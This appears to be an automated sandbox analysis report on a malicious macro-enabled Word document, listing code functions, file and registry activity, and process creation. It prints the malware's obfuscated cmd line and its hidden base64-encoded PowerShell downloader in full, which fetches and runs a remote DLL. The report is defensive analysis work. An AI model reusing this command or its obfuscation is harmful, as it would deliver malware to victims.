                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00403FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00419DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00417BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00404844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040E044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00410672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040BE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00412C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00401806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00402208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040E612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00406417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00410223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00412631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00418A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040D2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040D6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040ECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040DE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00411090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00414A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040CAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00413F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040C364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00403B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00407378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00405B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00414F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00409106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00407731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00403336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00403938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00407B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004057D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040F5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00416BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004035FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00417187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00411F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00404D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00413590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0041C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040BB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00412FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004193AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040ADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004147B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_004109B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040F9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0040FFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00309C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00314012
                      Source: Bestellung.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Ynzysnuyyfihfq23d, Function Document_open
                      Source: Bestellung.docOLE indicator, VBA macros: true
                      Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@16/12@6/12
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00412B68 CreateToolhelp32Snapshot,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$stellung.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC6D7.tmpJump to behavior
                      Source: Bestellung.docOLE indicator, Word Document stream: true
                      Source: Bestellung.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ..%..................................... .D.......D.....................................#.........................%.....h.......5kU.............
                      Source: C:\Windows\System32\msg.exeConsole Write: ................(...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.......L.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........].............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j....................................}..v....(.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... ..............................}..v............0.................].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....................v..j....................................}..v............0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................v..j......].............................}..v............0...............x.].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....#...............&..j....................................}..v............0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............&..j..... ..............................}..v....X.......0.................].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....7..................j.....G].............................}..v.....O......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....xP..............................}..v.....P......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....C..................j.....G].............................}..v.....W......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....xX..............................}..v.....X......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............0.......O.........................D..... .......................}..v....._...... .................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....x`..............................}..v.....`......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.....e......0................D].....(.......(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j.....e..............................}..v....Hf......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.4.............}..v....Xj......0................D].....$.......(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j.....k..............................}..v.....k......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....s..................j.....G].............................}..v....Xr......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j.....s..............................}..v.....s......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....Xz......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....{..............................}..v.....{......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....'..................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....3..................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....?..................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............E.......K..................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....W..................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....c..................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....o..................j.....G].............................}..v....X.......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j....................................}..v............0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....{..................j.....G].............................}..v....X"......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....#..............................}..v.....#......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X*......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....+..............................}..v.....+......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v....X2......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....3..............................}..v.....3......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............8.8.'.+.'.V.'.).).].............................}..v.... 7......0................D].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....7..............................}..v....X8......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v.....?......0.................%.............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....?..............................}..v....8@......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v.......................j.....G].............................}..v.....E......0.................%.....r.......(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....@F..............................}..v.....F......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j.....G].............................}..v....PJ......0................D].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....K..............................}..v.....K......0...............8E].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E...............................}..v............0.................].............(...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E...............................}..v....(.......0.................].............(...............
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: Bestellung.docVirustotal: Detection: 53%
                      Source: Bestellung.docReversingLabs: Detection: 11%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAd